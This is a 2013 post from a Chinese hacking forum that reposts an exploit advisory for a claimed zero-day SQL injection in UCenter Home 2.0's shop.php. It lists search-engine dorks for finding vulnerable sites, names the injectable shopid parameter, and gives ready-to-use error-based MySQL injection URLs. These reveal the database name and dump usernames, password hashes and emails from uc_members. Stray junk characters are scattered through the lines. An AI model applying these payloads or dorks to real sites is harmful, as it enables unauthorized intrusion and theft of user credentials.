找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2142|回复: 0
打印 上一主题 下一主题

UCenter Home 2.0 -(0day) Remote SQL Injection Vulnerability

[复制链接]
跳转到指定楼层
楼主
发表于 2013-2-27 21:31:31 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
7 q, l1 C" ]1 V, }7 ~4 e
__--==UCenter Home 2.0 -(0day) Remote SQL Injection Vulnerability==--__  4 u( s: r# Y: U

: V$ `: E: N7 ^  I  y# Q/ C$ v. W                                 
& y5 I, j( G! ~' y1 n' ^
- t1 V( g8 B3 v* T% C*/ Author : KnocKout  
% ^# z  z& j) y/ I2 w8 Q& y
/ V' w! Y# y+ k*/ Greatz : DaiMon,BARCOD3,RiskY and iranian hackers  / @3 g" l8 e1 l/ {/ p

& W$ Z- o" i7 g*/ Contact: knockoutr@msn.com  
. y7 Z% U6 D1 V9 ]7 q7 O( E/ j- p7 N% Z1 L3 Z# M1 A4 O
*/ Cyber-Warrior.org/CWKnocKout  5 j0 c& r4 q9 E! e' ~6 I# H; J8 H6 E

2 `# o' y1 ~& |2 O  l__--==__--==__--==__--==__--==__--==__--==__--==__--==__--==  
. v2 U2 N9 z4 b6 g. ]2 l" j$ b) S# I0 i' ~" C! a( ]
Script : UCenter Home  
  a  b, k+ G, J. M( ]" z5 ?/ j% c' [2 U( K
Version : 2.0  7 ]% L5 Q+ a# W# w+ X1 F3 H

) N( t  \/ N- v8 @4 OScript HomePage : http://u.discuz.net/  0 D7 z+ i6 F* }+ t( D  c. D
) a+ `) X& m  s0 R
__--==__--==__--==__--==__--==__--==__--==__--==__--==__--==  . @. o7 [  I# t0 y& N2 F6 z
& w. z, _2 L  S" `( o7 S
Dork : Powered by UCenter inurl:shop.php?ac=view  
) |, u. W# l6 I2 _9 X0 r
* v! z$ I7 q! ?6 ^, t: H% xDork 2 : inurl:shop.php?ac=view&shopid=  2 `6 p; d5 _# }7 m/ B7 ]

+ H  n4 g7 [  ?& a% f9 d__--==__--==__--==__--==__--==__--==__--==__--==__--==__--==  : [& M# |( S' ]; u7 [# X
% P8 m, F. h! h+ V5 j/ \
Vuln file : Shop.php  , C4 F1 ]! E  L/ C4 i

. j/ e& T& ^$ V" t  H3 R5 zvalue's : (?)ac=view&shopid=  
6 _7 L- J) V! C  @. ?+ ~
$ A3 k, Y; i, }0 q' e" KVulnerable Style : SQL Injection (MySQL Error Based)  
, R% a+ z# R! D0 C8 Y9 h9 r! c( i
Need Metarials : Hex Conversion  
- B! L1 t* C- v* h) b0 |
0 u& A* [* [9 d* W. y8 ]( C__--==__--==__--==__--==__--==__--==__--==__--==__--==__--==  + R" x% M8 N2 U
( w9 h+ \9 c) ~1 ~, g: y) X6 T/ y
Your Need victim Database name.   1 H5 i2 }7 h2 P6 C
: v  e5 W6 Y2 m4 q
for Inject : http://server/shop.php?ac=view&shopid=253 and(select 1 from(select count(*),concat((select (select concat(0x7e,0x27,unhex(hex(database())),0x27,0x7e)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1  # P" T$ R8 y$ A- o# f4 T9 X3 h8 l

7 \7 @$ d# h7 v..  
/ K$ i' Z+ i( P+ O
+ ]" o* e) g( O3 x5 `DB : Okey.  ! b  j" E! ^) z) n2 P

, R& I* n7 n/ @. c: V( Myour edit DB `[TARGET DB NAME]`  ( q6 v, @% g9 G' O/ o

- ?  s) `( u. MExample : 'hiwir1_ucenter'  " g, D* d# j8 }: U7 I9 C2 `2 d

" x2 F& t6 G+ HEdit : Okey.  
- Q/ u+ {# c% B
- Q( v% P; E0 I( sYour use Hex conversion. And edit Your SQL Injection Exploit..  
( X4 v, \& X3 q2 i- p/ p6 S( N4 a0 t) D5 s. R
   $ b6 h% W3 G. v

6 _) \' d4 t) i  h0 AExploit Code : http://server/shop.php?ac=view&shopid=253 253 and(select 1 from(select count(*),concat((select (select (SELECT concat(0x7e,0x27,cast(concat(uc_members.uid,0x3a,uc_members.username,0x3a,uc_members.password,0x3a,uc_members.email) as char),0x27,0x7e) FROM `hiwir1_ucenter`.uc_members LIMIT 0,1) ) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1  ' J8 l) e; a" U* L
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表